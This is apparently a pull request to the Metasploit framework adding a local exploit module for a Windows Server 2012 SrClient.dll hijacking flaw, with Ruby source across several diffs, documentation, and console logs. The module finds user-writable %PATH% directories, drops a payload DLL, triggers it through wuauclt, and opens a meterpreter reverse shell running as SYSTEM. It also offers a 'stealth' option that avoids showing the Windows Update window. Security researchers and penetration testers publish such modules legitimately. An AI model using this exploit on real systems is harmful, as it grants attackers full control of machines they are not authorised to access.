### PR TITLE
Add Window Server 2012 SrClient DLL Hijacking local exploit module and docs

### DIFF
--- a/documentation/modules/exploit/windows/local/srclient_dll_hijacking.md
+++ b/documentation/modules/exploit/windows/local/srclient_dll_hijacking.md
@@ -49,6 +49,9 @@ the module will enumerate the %PATH% directories and try to find one that is wri
 If this is enabled, the module will only exploit the target if this is possible by triggering the payload via the
 `WUAUCLT /DetectNow` command, which will launch Windows Update in the background.
 This means that exploitation will not proceed if Windows Update is set to never check for updates on the target.
+### WAIT_FOR_TOWORKER
+The number of minutes to wait for TiWorker.exe to finish running if it is already active (because the exploit won't work if it is).
+The default value is 0.
 
 ## Scenarios
 ### Windows 2012 x64 - %PATH% enumeration (default) with Verbose set to true
@@ -70,6 +73,7 @@ Module options (exploit/windows/local/srclient_dll_hijacking):
    ----               ---------------  --------  -----------
    SESSION            3                yes       The session to run this module on.
    STEALTH_ONLY       false            no        Only exploit if the payload can be triggered without launching the Windows Update UI)
+   WAIT_FOR_TIWORKER  0                no        No. of minutes to wait for TiWorker.exe to finish running if it is already active.
    WRITABLE_PATH_DIR                   no        Path to a writable %PATH% directory to write the payload to.
 
 
@@ -146,6 +150,7 @@ Module options (exploit/windows/local/srclient_dll_hijacking):
    ----               ---------------  --------  -----------
    SESSION            8                yes       The session to run this module on.
    STEALTH_ONLY       false            no        Only exploit if the payload can be triggered without launching the Windows Update UI)
+   WAIT_FOR_TIWORKER  0                no        No. of minutes to wait for  TiWorker.exe to finish running if it is already active.
    WRITABLE_PATH_DIR  c:\wynter        no        Path to a writable %PATH% directory to write the payload to.
 
 

--- a/documentation/modules/exploit/windows/local/srclient_dll_hijacking.md
+++ b/documentation/modules/exploit/windows/local/srclient_dll_hijacking.md
@@ -1,0 +1,188 @@
+## Vulnerable Application
+
+All editions of Windows Server 2012 (but not 2012 R2) are vulnerable to DLL hijacking due to the way `TiWorker.exe` will try to call the
+non-existent `SrClient.dll` file when Windows Update checks for updates.
+This issue can be leveraged for privilege escalation if %PATH% includes directories that are writable by low-privileged users.
+The attack can be triggered by any low-privileged user and does not require a system reboot.
+
+If run with default settings, the module will enumerate the %PATH% directories and try to find one that is writable by the current user.
+Alternatively, a specific %PATH% directory can be provided via the `WRITABLE_PATH_DIR` option.
+If a writable %PATH% directory is found, the module will write the payload with the name `SrClient.dll` to the vulnerable directory.
+
+Next, the module will try to obtain the Windows Update configuration.
+If Windows Update is not set to never check for updates, the module will use  the `WUAUCLT /DetectNow` command to trigger the payload.
+This command will instruct Windows Update to detect and download available updates in the background.
+If Windows Update is set to never check for updates, `WUAUCLT /DetectNow` will not work,
+and the module will trigger the payload via the `WUAUCLT /SelfUpdateManaged` command.
+This command launches the Windows Update window in the Control Panel and tells it to start checking for updates using
+Windows Server Update Services (WSUS).
+If stealth is required, you can set the `STEALTH_ONLY` option to prevent the module from proceeding with exploitation in this scenario.
+If the module fails to obtain the Windows Update configuration, it will use `WUAUCLT /SelfUpdateManaged` to trigger the payload
+unless the `STEALTH_ONLY` option is set. In the latter case, it will use the `WUAUCLT /DetectNow` command.
+
+This exploit has several limitations
+- The attack won't work when Windows Update is already checking for/downloading/installing updates on the target
+- The attack won't work twice in a row, at least not in quick succession (because the attack causes Windows Update to check for updates)
+
+If the module completes, but no session is created, check if `TiWorker.exe` is running on the target. If so, you have several options:
+- Wait until `TiWorker.exe` is no longer running before launching the module again.
+- Set `Wfsdelay` to a rather long period (at least half an hour), and run the module again.
+- Reboot the machine if you have persistence on the target and the current user has shutdown privileges
+(not recommended in a real world environment)
+
+This module has been successfully tested on Windows Server 2012 (x64).
+
+Windows Server 2012 VM images are available at the Microsoft Evaluation Center
+[here](https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2012).
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use modules/exploit/windows/local/srclient_dll_hijacking`
+3. Do: `set SESSION [SESSION ID]`
+4. Do: `run`
+
+## Options
+### WRITABLE_PATH_DIR
+The full path to a writable %PATH% directory to write the payload to. If this is not set,
+the module will enumerate the %PATH% directories and try to find one that is writable by the current user.
+### STEALTH_ONLY
+If this is enabled, the module will only exploit the target if this is possible by triggering the payload via the
+`WUAUCLT /DetectNow` command, which will launch Windows Update in the background.
+This means that exploitation will not proceed if Windows Update is set to never check for updates on the target.
+
+## Scenarios
+### Windows 2012 x64 - %PATH% enumeration (default) with Verbose set to true
+```
+msf6 exploit(windows/local/srclient_dll_hijacking) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                               Connection
+  --  ----  ----                     -----------                               ----------
+  3         meterpreter x64/windows  WIN-FCDUOQDT1NB\wynter @ WIN-FCDUOQDT1NB  192.168.91.12:8443 -> 192.168.91.16:49157 (192.168.91.16)
+
+msf6 exploit(windows/local/srclient_dll_hijacking) > show options 
+
+Module options (exploit/windows/local/srclient_dll_hijacking):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   SESSION            3                yes       The session to run this module on.
+   STEALTH_ONLY       false            no        Only exploit if the payload can be triggered without launching the Windows Update UI)
+   WRITABLE_PATH_DIR                   no        Path to a writable %PATH% directory to write the payload to.
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.91.12    yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Windows Server 2012 (x64)
+
+
+msf6 exploit(windows/local/srclient_dll_hijacking) > run
+
+[*] Started reverse TCP handler on 192.168.91.12:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[*] Target is Windows 2012 (6.2 Build 9200).
+[*] Obtaining group information for the current user WIN-FCDUOQDT1NB\wynter...
+[*] 
+[*]     Everyone
+[*]     BUILTIN\Users
+[*]     NT AUTHORITY\INTERACTIVE
+[*]     CONSOLE LOGON
+[*]     NT AUTHORITY\Authenticated Users
+[*]     NT AUTHORITY\This Organization
+[*]     NT AUTHORITY\Local account
+[*]     LOCAL
+[*]     NT AUTHORITY\NTLM Authentication
+[*] 
+[*] Checking for writable directories in %PATH%...
+[*] 
+[*]     Checking permissions for C:\Windows\system32
+[*]     Checking permissions for C:\Windows
+[*]     Checking permissions for C:\Windows\System32\Wbem
+[*]     Checking permissions for C:\Windows\System32\WindowsPowerShell\v1.0\
+[*]     Checking permissions for C:\wynter
+[*] 
+[+] WIN-FCDUOQDT1NB\wynter has write permissions to the following %PATH% directories:
+[*] 
+[*]     C:\wynter
+[*] 
+[+] The target appears to be vulnerable.
+[*] Writing 5120 bytes to C:\wynter\SrClient.dll...
+[*] Trying to trigger the payload in the background via the shell command `wuauclt /detectnow`
+[*] Sending stage (201283 bytes) to 192.168.91.16
+[*] Meterpreter session 4 opened (192.168.91.12:4444 -> 192.168.91.16:49159) at 2021-02-16 08:59:24 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```
+### Windows 2012 x64 - WRITABLE_PATH_DIR option set, Verbose set to false
+```
+msf6 exploit(windows/local/srclient_dll_hijacking) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                               Connection
+  --  ----  ----                     -----------                               ----------
+  8         meterpreter x64/windows  WIN-FCDUOQDT1NB\wynter @ WIN-FCDUOQDT1NB  192.168.91.12:8443 -> 192.168.91.16:49158 (192.168.91.16)
+
+msf6 exploit(windows/local/srclient_dll_hijacking) > show options 
+
+Module options (exploit/windows/local/srclient_dll_hijacking):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   SESSION            8                yes       The session to run this module on.
+   STEALTH_ONLY       false            no        Only exploit if the payload can be triggered without launching the Windows Update UI)
+   WRITABLE_PATH_DIR  c:\wynter        no        Path to a writable %PATH% directory to write the payload to.
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.91.12    yes       The listen address (an interface may be specified)
+   LPORT     5555             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Windows Server 2012 (x64)
+
+
+msf6 exploit(windows/local/srclient_dll_hijacking) > run
+
+[*] Started reverse TCP handler on 192.168.91.12:5555 
+[*] Executing automatic check (disable AutoCheck to override)
+[*] Target is Windows 2012 (6.2 Build 9200).
+[*] Obtaining group information for the current user WIN-FCDUOQDT1NB\wynter...
+[*] 
+[*] Checking for writable directories in %PATH%...
+[*] 
+[+] WIN-FCDUOQDT1NB\wynter has write permissions to c:\wynter
+[+] The target appears to be vulnerable.
+[*] Writing 5120 bytes to C:\wynter\SrClient.dll...
+[!] Because Windows Update is set to never check for updates, triggering the payload requires launching the Windows Update window on the target.
+[*] Trying to trigger the payload via the shell command `wuauclt /selfupdatemanaged`
+[*] Sending stage (201283 bytes) to 192.168.91.16
+[*] Meterpreter session 9 opened (192.168.91.12:5555 -> 192.168.91.16:49160) at 2021-02-16 09:12:28 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+
+```

--- a/modules/exploits/windows/local/srclient_dll_hijacking.rb
+++ b/modules/exploits/windows/local/srclient_dll_hijacking.rb
@@ -37,14 +37,6 @@ class MetasploitModule < Msf::Exploit::Local
         'Targets' =>
           [
             [
-              'Windows Server 2012 (x86)', {
-                'Arch' => [ARCH_X86],
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
-                }
-              }
-            ],
-            [
               'Windows Server 2012 (x64)', {
                 'Arch' => [ARCH_X64],
                 'DefaultOptions' => {
@@ -58,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Local
             [ 'URL', 'https://blog.vonahi.io/srclient-dll-hijacking' ],
           ],
         'DisclosureDate' => '2021-02-19',
-        'DefaultTarget' => 1,
+        'DefaultTarget' => 0,
         'Notes' =>
           {
             'Stability' => [ CRASH_SAFE, ],
@@ -69,13 +61,22 @@ class MetasploitModule < Msf::Exploit::Local
 
     register_options([
       OptString.new('WRITABLE_PATH_DIR', [false, 'Path to a writable %PATH% directory to write the payload to.', '']),
-      OptBool.new('STEALTH_ONLY', [false, 'Only exploit if the payload can be triggered without launching the Windows Update UI) ', false])
+      OptBool.new('STEALTH_ONLY', [false, 'Only exploit if the payload can be triggered without launching the Windows Update UI) ', false]),
+      OptInt.new('WAIT_FOR_TIWORKER', [false, 'No. of minutes to wait for TiWorker.exe to finish running if it is already active. ', 0])
     ])
 
   end
 
   def provided_path_dir
     datastore['WRITABLE_PATH_DIR']
+  end
+
+  def stealth_only
+    datastore['STEALTH_ONLY']
+  end
+
+  def wait_for_tiworker
+    datastore['WAIT_FOR_TIWORKER']
   end
 
   def force_exploit_message
@@ -100,10 +101,10 @@ class MetasploitModule < Msf::Exploit::Local
 
         group = line.split('   ')[0]
         user_groups << group
-        vprint_status("\t#{group}")
+        print_status("\t#{group}")
       end
 
-      vprint_status('')
+      print_status('')
     end
     user_groups
   end
@@ -136,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Local
     perms_we_need = ['(F)', '(M)']
     print_status('')
 
-    path_dirs['PATH'].split(';').each do |pdir|
+    path_dirs.split(';').each do |pdir|
       next if pdir.blank? || pdir.strip.blank?
 
       # directories can't and with a backslash, otherwise some commands will throw an error
@@ -147,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Local
         next
       end
 
-      vprint_status("\tChecking permissions for #{pdir}")
+      print_status("\tChecking permissions for #{pdir}")
 
       # check if the current user owns pdir
       user_owns_pdir = find_pdir_owner(pdir, current_user)
@@ -190,7 +191,7 @@ class MetasploitModule < Msf::Exploit::Local
       end
     end
 
-    vprint_status('')
+    print_status('')
 
     writable_path_dirs
   end
@@ -200,6 +201,28 @@ class MetasploitModule < Msf::Exploit::Local
       print_status("Trying to trigger the payload in the background via the shell command `#{trigger_cmd}`")
     else
       print_status("Trying to trigger the payload via the shell command `#{trigger_cmd}`")
+    end
+  end
+
+  def monitor_tiworker
+    print_warning("TiWorker.exe is already running on the target. The module will monitor the process every 10 seconds for up to #{wait_for_tiworker} minute(s)...")
+    wait_time_left = wait_for_tiworker
+    sleep_time = 0
+    while wait_time_left > 0
+      sleep 10
+
+      host_processes = client.sys.process.get_processes
+      if host_processes.none? { |ps| ps['name'] == 'TiWorker.exe' }
+        print_status('TiWorker.exe is no longer running on the target. Proceding with exploitation.')
+        break
+      end
+
+      sleep_time += 10
+      next unless sleep_time == 60
+
+      wait_time_left -= 1
+      sleep_time = 0
+      print_status("TiWorker.exe is still running on the target. The module will keep checking for #{wait_time_left} minute(s)...")
     end
   end
 
@@ -215,15 +238,28 @@ class MetasploitModule < Msf::Exploit::Local
 
     print_status("Target is #{sysinfo['OS']}")
 
+    # obtain the Windows Update setting to see if exploitation could work at all
+    @wupdate_setting = registry_getvaldata('HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Auto Update', 'AUOptions')
+
+    if @wupdate_setting.nil?
+      # if this is true, Windows Update has probably never been configured on the target, and the attack most likely won't work.
+      return Exploit::CheckCode::Safe('Target is Windows Server 2012, but cannot be exploited because Windows Update has not been configured.')
+    end
+
+    unless (1..4).include?(@wupdate_setting)
+      return Exploit::CheckCode::Unknown('Received unexpected reply when trying to obtain the Windows Update setting.')
+    end
+
     # get groups for the current user, this is necessary to verify write permissions
     current_user = session.sys.config.getuid
     user_groups = grab_user_groups(current_user)
 
     # get %PATH% dirs and check if the current user can write to them
     print_status('Checking for writable directories in %PATH%...')
-    path_dirs = get_envs('PATH')
+    # we can't use get_envs('PATH') here because that returns all PATH directories, but we only need those in the SYSTEM PATH
+    path_dirs = registry_getvaldata('HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment', 'path')
 
-    if path_dirs.blank? || path_dirs['PATH'].blank?
+    if path_dirs.blank?
       get_path_fail_message = 'Failed to obtain %PATH% directories.'
       unless provided_path_dir.blank?
         get_path_fail_message << force_exploit_message
@@ -259,25 +295,31 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::None, 'Session is already elevated')
     end
 
-    if sysinfo['Architecture'] =~ /wow64/i
-      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
-    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
-      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
-    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
-      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
+    payload_arch = payload.arch.first # TODO: Add missing documentation for payload.arch, @wvu used this first but it is not documented anywhere.
+    if (payload_arch != ARCH_X64)
+      fail_with(Failure::BadConfig, "Unsupported payload architecture (#{payload_arch}). Only 64-bit (x64) payloads are supported.") # Unsupported architecture, so return an error.
     end
 
-    # There are two commands we can run to get the target to start checking for Windows updates, which should launch TiWorker.exe and trigger the payload as SYSTEM
+    # check if TiWorker.exe is already running, in which case exploitation will fail
+    host_processes = client.sys.process.get_processes
+    if host_processes.any? { |ps| ps['name'] == 'TiWorker.exe' }
+      unless wait_for_tiworker > 0
+        fail_with(Failure::Unknown, 'TiWorker.exe is already running on the target. Set `WAIT_FOR_TIWORKER` to force the module to wait for the process to finish.')
+      end
+
+      monitor_tiworker
+    end
+
+    # There are three commands we can run to get the target to start checking for Windows updates, which should launch TiWorker.exe and trigger the payload as SYSTEM
     ## 'wuauclt /detectnow': This triggers the payload in the background, but won't work when Windows Update is set to never check for updates.
-    ## 'wuauclt /selfupdatemanaged': This triggers the payload by launching the Windows Update UI. This is far from stealthy, but works with all Windows Update settings.
+    ## 'wuauclt /selfupdatemanaged': This triggers the payload by launching the Windows Update UI, which then scans for updates using the WSUS settings. This is not stealthy, but works with all Windows Update settings.
+    ## 'wuauclt /selfupdateunmanaged': This triggers the payload by launching the Windows Update UI, which then scans for updates using the Windows Update site. This is not stealthy, but works with all Windows Update settings.
+    ## the module prefers /selfupdatemanaged over /selfupdateunmanaged when /detectnow is not possible because /selfupdateunmanaged may require the target to be able to reach the Windows Update server
 
-    # obtain the Windows Update setting
-    wupdate_setting = registry_getvaldata('HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Auto Update', 'AUOptions')
-
-    case wupdate_setting
+    case @wupdate_setting
     when 1
       print_warning('Because Windows Update is set to never check for updates, triggering the payload requires launching the Windows Update window on the target.')
-      if datastore['STEALTH_ONLY']
+      if stealth_only
         fail_with(Failure::Unknown, 'Exploitation cannot proceed stealthily. If you still want to exploit, set `STEALTH_ONLY` to false.')
         return
       end
@@ -286,8 +328,9 @@ class MetasploitModule < Msf::Exploit::Local
       # trigger the payload in the background if we can
       trigger_cmd = 'wuauclt /detectnow'
     else
-      print_warning('Failed to obtain the Windows Update setting.')
-      if datastore['STEALTH_ONLY']
+      # if this is true, ForceExploit has been set and we should just roll with it
+      print_warning('Windows Update is not configured or returned an unexpected value. Exploitation may not work.')
+      if stealth_only
         trigger_cmd = 'wuauclt /detectnow'
       else
         # go out guns blazing and hope for the best

--- a/modules/exploits/windows/local/srclient_dll_hijacking.rb
+++ b/modules/exploits/windows/local/srclient_dll_hijacking.rb
@@ -1,0 +1,329 @@
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Server 2012 SrClient DLL hijacking',
+        'Description' => %q{
+          All editions of Windows Server 2012 (but not 2012 R2) are vulnerable to DLL
+          hijacking due to the way TiWorker.exe will try to call the non-existent
+          `SrClient.dll` file when Windows Update checks for updates. This issue can be
+          leveraged for privilege escalation if %PATH% includes directories that are
+          writable by low-privileged users. The attack can be triggered by any
+          low-privileged user and does not require a system reboot.
+
+          This module has been successfully tested on Windows Server 2012 (x64).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Erik Wynter' # @wyntererik - Discovery & Metasploit
+        ],
+        'Platform' => 'win',
+        'SessionTypes' => [ 'meterpreter' ],
+        'DefaultOptions' =>
+       {
+         'Wfsdelay' => 60,
+         'EXITFUNC' => 'thread'
+       },
+        'Targets' =>
+          [
+            [
+              'Windows Server 2012 (x86)', {
+                'Arch' => [ARCH_X86],
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+                }
+              }
+            ],
+            [
+              'Windows Server 2012 (x64)', {
+                'Arch' => [ARCH_X64],
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+                }
+              }
+            ]
+          ],
+        'References' =>
+          [
+            [ 'URL', 'https://blog.vonahi.io/srclient-dll-hijacking' ],
+          ],
+        'DisclosureDate' => '2021-02-19',
+        'DefaultTarget' => 1,
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE, ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS ]
+          }
+      )
+      )
+
+    register_options([
+      OptString.new('WRITABLE_PATH_DIR', [false, 'Path to a writable %PATH% directory to write the payload to.', '']),
+      OptBool.new('STEALTH_ONLY', [false, 'Only exploit if the payload can be triggered without launching the Windows Update UI) ', false])
+    ])
+
+  end
+
+  def provided_path_dir
+    datastore['WRITABLE_PATH_DIR']
+  end
+
+  def force_exploit_message
+    " If #{provided_path_dir} should be writable and part of %PATH%, enter `set ForceExploit true` and rerun the module."
+  end
+
+  def grab_user_groups(current_user)
+    print_status("Obtaining group information for the current user #{current_user}...")
+
+    # add current user to the groups we are a member of in case user-specific permissions are set for any of the %PATH% directories
+    user_groups = [current_user]
+
+    whoami_groups = get_whoami
+
+    unless whoami_groups.blank?
+      print_status('')
+      whoami_groups.split("\r\n").each do |line|
+        exclude_strings = ['----', '====', 'GROUP INFORMATION', 'Group Name', 'Mandatory Label']
+        line = line.strip
+        next if line.empty?
+        next if exclude_strings.any? { |ex_str| line.include?(ex_str) }
+
+        group = line.split('   ')[0]
+        user_groups << group
+        vprint_status("\t#{group}")
+      end
+
+      vprint_status('')
+    end
+    user_groups
+  end
+
+  def find_pdir_owner(pdir, current_user)
+    # we need double backslashes in the path for wmic, using block gsub because regular gsub doesn't seem to work
+    pdir_escaped = pdir.gsub(/\\/) { '\\\\' }
+    pdir_owner_info = cmd_exec("wmic path Win32_LogicalFileSecuritySetting where Path=\"#{pdir_escaped}\" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID")
+    if pdir_owner_info.blank? || pdir_owner_info.split('{')[0].blank?
+      return false
+    end
+
+    pdir_owner_suffix = pdir_owner_info.split('{')[0]
+    pdir_owner_prefix = pdir_owner_info.scan(/\}\s+(.*?)S-\d-\d+-(\d+-){1,14}\d/).flatten.first
+
+    if pdir_owner_prefix.blank? || pdir_owner_suffix.blank?
+      return false
+    end
+
+    pdir_owner_name = "#{pdir_owner_prefix.strip}\\#{pdir_owner_suffix.strip}"
+    if pdir_owner_name.downcase == current_user.downcase
+      return true
+    else
+      return false
+    end
+  end
+
+  def enumerate_writable_path_dirs(path_dirs, user_groups, current_user)
+    writable_path_dirs = []
+    perms_we_need = ['(F)', '(M)']
+    print_status('')
+
+    path_dirs['PATH'].split(';').each do |pdir|
+      next if pdir.blank? || pdir.strip.blank?
+
+      # directories can't and with a backslash, otherwise some commands will throw an error
+      pdir = pdir.strip.delete_suffix('\\')
+
+      # if the user has provided a target dir, only look at that one
+      if !provided_path_dir.blank? && pdir.downcase != provided_path_dir.downcase
+        next
+      end
+
+      vprint_status("\tChecking permissions for #{pdir}")
+
+      # check if the current user owns pdir
+      user_owns_pdir = find_pdir_owner(pdir, current_user)
+
+      # use icalcs to get the directory permissions
+      permissions = cmd_exec("icacls \"#{pdir}\"")
+      next if permissions.blank?
+      next if permissions.split(pdir.to_s)[1] && permissions.split(pdir.to_s)[1].length < 2
+
+      # the output should always start with the provided directory, so we need to remove that
+      groups_perms = permissions.split(pdir.to_s)[1].strip
+      next if groups_perms.empty?
+
+      # iterate over the listed permissions for different groups
+      groups_perms.split("\n").each do |gp|
+        gp = gp.strip
+
+        # the format should be <group>:<perms>, so gp must always include `:`
+        next unless gp.include?(':')
+
+        # grab the group name and permissions
+        group, perms = gp.split(':')
+        next if group.blank? || perms.blank?
+
+        group = group.strip
+        perms = perms.strip
+
+        # if the current user owns the directory, check for the directory permissions as well
+        if user_owns_pdir && group == 'CREATOR OWNER' && perms_we_need.any? { |prm| perms.downcase.include? prm.downcase }
+          writable_path_dirs << pdir unless writable_path_dirs.include?(pdir)
+          next
+        end
+
+        # ignore groups that don't match the groups for the current user, or the required permissions
+        next unless user_groups.any? { |ug| group.downcase == ug.downcase }
+        next unless perms_we_need.any? { |prm| perms.downcase.include? prm.downcase }
+
+        # if we are here, we found a %PATH% directory we can write to!!!
+        writable_path_dirs << pdir unless writable_path_dirs.include?(pdir)
+      end
+    end
+
+    vprint_status('')
+
+    writable_path_dirs
+  end
+
+  def exploitation_message(trigger_cmd)
+    if trigger_cmd == 'wuauclt /detectnow'
+      print_status("Trying to trigger the payload in the background via the shell command `#{trigger_cmd}`")
+    else
+      print_status("Trying to trigger the payload via the shell command `#{trigger_cmd}`")
+    end
+  end
+
+  def check
+    # check OS
+    unless sysinfo['OS'].include?('2012')
+      return Exploit::CheckCode::Safe('Target is not Windows Server 2012.')
+    end
+
+    if sysinfo['OS'].include?('R2')
+      return Exploit::CheckCode::Safe('Target is Windows Server 2012 R2, but only Windows Server 2012 is vulnerable.')
+    end
+
+    print_status("Target is #{sysinfo['OS']}")
+
+    # get groups for the current user, this is necessary to verify write permissions
+    current_user = session.sys.config.getuid
+    user_groups = grab_user_groups(current_user)
+
+    # get %PATH% dirs and check if the current user can write to them
+    print_status('Checking for writable directories in %PATH%...')
+    path_dirs = get_envs('PATH')
+
+    if path_dirs.blank? || path_dirs['PATH'].blank?
+      get_path_fail_message = 'Failed to obtain %PATH% directories.'
+      unless provided_path_dir.blank?
+        get_path_fail_message << force_exploit_message
+      end
+      return Exploit::CheckCode::Unknown(get_path_fail_message)
+    end
+
+    @writable_path_dirs = enumerate_writable_path_dirs(path_dirs, user_groups, current_user)
+
+    writable_path_dirs_fail_message = "#{current_user} does not seem to have write permissions to any of the %PATH% directories"
+
+    if @writable_path_dirs.empty?
+      unless provided_path_dir.blank?
+        writable_path_dirs_fail_message << force_exploit_message
+      end
+      return Exploit::CheckCode::Safe(writable_path_dirs_fail_message)
+    end
+
+    if provided_path_dir.blank?
+      print_good("#{current_user} has write permissions to the following %PATH% directories:")
+      print_status('')
+      @writable_path_dirs.each { |wpd| print_status("\t#{wpd}") }
+      print_status('')
+    else
+      print_good("#{current_user} has write permissions to #{provided_path_dir}")
+    end
+
+    return Exploit::CheckCode::Appears
+  end
+
+  def exploit
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if sysinfo['Architecture'] =~ /wow64/i
+      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
+    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
+      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
+    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
+      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
+    end
+
+    # There are two commands we can run to get the target to start checking for Windows updates, which should launch TiWorker.exe and trigger the payload as SYSTEM
+    ## 'wuauclt /detectnow': This triggers the payload in the background, but won't work when Windows Update is set to never check for updates.
+    ## 'wuauclt /selfupdatemanaged': This triggers the payload by launching the Windows Update UI. This is far from stealthy, but works with all Windows Update settings.
+
+    # obtain the Windows Update setting
+    wupdate_setting = registry_getvaldata('HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Auto Update', 'AUOptions')
+
+    case wupdate_setting
+    when 1
+      print_warning('Because Windows Update is set to never check for updates, triggering the payload requires launching the Windows Update window on the target.')
+      if datastore['STEALTH_ONLY']
+        fail_with(Failure::Unknown, 'Exploitation cannot proceed stealthily. If you still want to exploit, set `STEALTH_ONLY` to false.')
+        return
+      end
+      trigger_cmd = 'wuauclt /selfupdatemanaged'
+    when 2..4
+      # trigger the payload in the background if we can
+      trigger_cmd = 'wuauclt /detectnow'
+    else
+      print_warning('Failed to obtain the Windows Update setting.')
+      if datastore['STEALTH_ONLY']
+        trigger_cmd = 'wuauclt /detectnow'
+      else
+        # go out guns blazing and hope for the best
+        print_status('The module will launch the Windows Update window on the target in an attempt to trigger the payload.')
+        trigger_cmd = 'wuauclt /selfupdatemanaged'
+      end
+    end
+
+    # select a target directory to write the payload to
+    if @writable_path_dirs.empty? # this means ForceExploit is being used
+      if provided_path_dir.blank?
+        fail_with(Failure::BadConfig, 'Using ForceExploit requires `WRITABLE_PATH_DIR` to be set.')
+      end
+
+      dll_path = provided_path_dir
+    else
+      dll_path = @writable_path_dirs[0]
+    end
+
+    # generate and write payload
+    dll_path << '\\' unless dll_path.end_with?('\\')
+    @dll_file_path = "#{dll_path}SrClient.dll"
+    dll = generate_payload_dll
+
+    print_status("Writing #{dll.length} bytes to #{@dll_file_path}...")
+    begin
+      # write_file(@dll_file_path, dll)
+      write_file(@dll_file_path, dll)
+      register_file_for_cleanup(@dll_file_path)
+    rescue Rex::Post::Meterpreter::RequestError => e
+      # Can't write the file, can't go on
+      fail_with(Failure::Unknown, e.message)
+    end
+
+    # trigger the payload
+    exploitation_message(trigger_cmd)
+    cmd_exec(trigger_cmd)
+  end
+end

--- a/modules/exploits/windows/local/srclient_dll_hijacking.rb
+++ b/modules/exploits/windows/local/srclient_dll_hijacking.rb
@@ -295,7 +295,7 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::None, 'Session is already elevated')
     end
 
-    payload_arch = payload.arch.first # TODO: Add missing documentation for payload.arch, @wvu used this first but it is not documented anywhere.
+    payload_arch = payload.arch.first
     if (payload_arch != ARCH_X64)
       fail_with(Failure::BadConfig, "Unsupported payload architecture (#{payload_arch}). Only 64-bit (x64) payloads are supported.") # Unsupported architecture, so return an error.
     end


### PR DESCRIPTION
## About
This change adds a new local exploit module for a  Windows Server 2012 DLL hijacking vulnerability that I recently discovered. This is a 0-day, but it won't be patched because it requires %PATH% to include directories that are writable by low-privileged users, and Microsoft won't patch %PATH% DLL Hijacking issues. That's why there is no CVE information, and there won't be.

A full write-up is available [here](https://blog.vonahi.io/srclient-dll-hijacking/)
I also published two demo video:
- [SrClient.dll manual exploitation](https://youtu.be/JpZQcemvbv4)
- [SrClient.dll Metasploit exploitation](https://youtu.be/qYuyRi_9d30)

## Vulnerable Application

All editions of Windows Server 2012 (but not 2012 R2) are vulnerable to DLL hijacking due to the way `TiWorker.exe` will try to call the non-existent `SrClient.dll` file when Windows Update checks for updates. This issue can be leveraged for privilege escalation if %PATH% includes directories that are writable by low-privileged users. The attack can be triggered by any low-privileged user and does not require a system reboot.

This exploit has several limitations
- The attack won't work when Windows Update is already checking for/downloading/installing updates on the target
- The attack won't work twice in a row, at least not in quick succession (because the attack causes Windows Update to check for updates)

Windows Server 2012 VM images are available at the Microsoft Evaluation Center [here](https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2012).

## Verification Steps
1. Start msfconsole
2. Do: `use modules/exploit/windows/local/srclient_dll_hijacking`
